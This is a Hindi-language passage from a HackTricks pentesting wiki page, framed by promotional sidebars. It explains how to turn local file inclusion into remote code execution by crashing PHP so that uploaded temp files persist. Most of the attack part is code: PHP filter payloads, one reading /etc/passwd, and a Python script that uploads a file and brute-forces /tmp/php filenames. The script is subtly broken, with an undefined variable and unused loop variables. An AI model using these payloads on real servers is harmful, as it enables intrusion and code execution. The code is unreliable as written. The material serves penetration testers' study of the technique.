mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
80 lines
7.4 KiB
Markdown
80 lines
7.4 KiB
Markdown
# LFI2RCE के माध्यम से सेगमेंटेशन फॉल्ट
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
|
|
|
|
</details>
|
|
|
|
व्रिटअप्स [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) के अनुसार, निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट को उत्पन्न किया:
|
|
```php
|
|
// PHP 7.0
|
|
include("php://filter/string.strip_tags/resource=/etc/passwd");
|
|
|
|
// PHP 7.2
|
|
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
|
|
```
|
|
आपको यह जानना चाहिए कि अगर आप एक फ़ाइल को साथ भेजते हुए एक POST अनुरोध भेजते हैं, तो PHP उस फ़ाइल की सामग्री के साथ `/tmp/php<something>` में एक अस्थायी फ़ाइल बनाएगा। इस फ़ाइल को अनुरोध को प्रोसेस करने के बाद स्वचालित रूप से हटा दिया जाएगा।
|
|
|
|
अगर आपको एक LFI मिलता है और आप PHP में एक segmentation fault को ट्रिगर करने में सफल होते हैं, तो अस्थायी फ़ाइल को कभी नहीं हटाया जाएगा। इसलिए, आप LFI संरचनासंबंधी कमजोरी के साथ उसे खोज सकते हैं जब तक आप उसे नहीं ढूंढ़ते और ऐसा कोड का निर्वाचन कर सकते हैं।
|
|
|
|
आप परीक्षण के लिए डॉकर इमेज [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) का उपयोग कर सकते हैं।
|
|
```python
|
|
# upload file with segmentation fault
|
|
import requests
|
|
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
|
|
files = {'file': open('la.php','rb')}
|
|
response = requests.post(url, files=files)
|
|
|
|
|
|
# Search for the file (improve this with threads)
|
|
import requests
|
|
import string
|
|
import threading
|
|
|
|
charset = string.ascii_letters + string.digits
|
|
|
|
host = "127.0.0.1"
|
|
port = 80
|
|
base_url = "http://%s:%d" % (host, port)
|
|
|
|
|
|
def bruteforce(charset):
|
|
for i in charset:
|
|
for j in charset:
|
|
for k in charset:
|
|
for l in charset:
|
|
for m in charset:
|
|
for n in charset:
|
|
filename = prefix + i + j + k
|
|
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
|
|
print url
|
|
response = requests.get(url)
|
|
if 'spyd3r' in response.content:
|
|
print "[+] Include success!"
|
|
return True
|
|
|
|
|
|
def main():
|
|
bruteforce(charset)
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
|
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
|
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
|
|
|
|
</details>
|